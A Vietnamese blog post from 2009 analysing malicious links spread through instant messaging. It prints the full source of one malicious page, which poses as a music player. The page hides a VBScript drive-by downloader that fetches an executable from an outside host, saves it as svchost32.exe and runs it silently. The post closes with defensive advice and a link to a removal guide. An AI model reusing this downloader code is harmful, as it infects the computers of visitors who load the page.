Trao đổi với tôi

http://www.buidao.com

7/4/09

[Virus] Virus lây qua IM

(Tác giả:Phạm Đức Hải)

Sau khi nhận được khá nhiều link chứa virus, tôi thử xem xem
vius đó là gì ?



http://www.traoluumoi.com/YMBEST/



http://vuichoivn.com



http://viet8x.evonet.ro





Tất cả các con virus này được tạo rất đơn giản bằng 1 chương
trình có tên :



Autoit3. Download tại đây : http://www.autoitscript.com/autoit3/



(Không khuyến cáo các bạn dùng thử)



Đây là mã nguồn của trang vuichoivn.com các con virus này :



<html>

 <head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta name="description" content="Audition">

<title>Nghe nhạc Audition | Hyo Ri Lee - 10 Minutes!</title>

</head>

 

<body bgcolor=black>

<script language="VBScript">

    on error resume next

    dl = "hxxp://vuichoivn.com/guitangban.exe"

    Set df = document.createElement("object")

    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

    str="Microsoft.XMLHTTP"

    Set x = df.CreateObject(str,"")

    a1="Ado"

    a2="db."

    a3="Str"

    a4="eam"

    str1=a1&a2&a3&a4

    str5=str1

    set S = df.createobject(str5,"")

    S.type = 1

    str6="GET"

    x.Open str6, dl, False

    x.Send

    fname1="svchost32.exe"

    set F = df.createobject("Scripting.FileSystemObject","")

    set tmp = F.GetSpecialFolder(2)

    fname1= F.BuildPath(tmp,fname1)

    S.open

    S.write x.responseBody

    S.savetofile fname1,2

    S.close

    set Q = df.createobject("Shell.Application","")

    Q.ShellExecute fname1,"","","open",0

    </script>

 
<div align = center>

<h2><font color=#FFFFFF>Các bạn đang nghe bài Hyo Ri Lee - 10 Minutes</font></h2>

<embed src="http://ladymoonlight.org/Hyo Ri Lee - 10 Minutes.mp3" autostart="true" >

</div>

<!-- Start of StatCounter Code -->

<script type="text/javascript" language="javascript">

var sc_project=1874708;

var sc_invisible=1;

var sc_partition=17;

var sc_security="ae164a82";

var sc_remove_link=1;

</script>

 <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script><noscript><img  src="http://c18.statcounter.com/counter.php?sc_project=1874708&java=0&security=ae164a82&invisible=1" alt="unique visitor counter" border="0"> </noscript>

<!-- End of StatCounter Code -->

 </body>

 </html>

Sau khi mở trang trên nó sẽ download file hxxp://vuichoivn.com/guitangban.exe về chạy, trong file này chứa các đoạn mã nguy hiểm.

Để tránh các virus này tốt nhất là cập nhật các bản diệt virus mới như SAV (đã diệt dc con này), BKAV cũng hay cập nhật (chưa test đã diệt con này hay chưa),... và quan tron là không bấm vào bất kỳ link gì khi chưa biết chắc, cho dù đó là ai gửi.

Hướng dẫn diệt virus của BKIS : http://www.bkav.com.vn/frmView.aspx?Noidung=HDDietVirusYM.htm
Được đăng bởi Lúc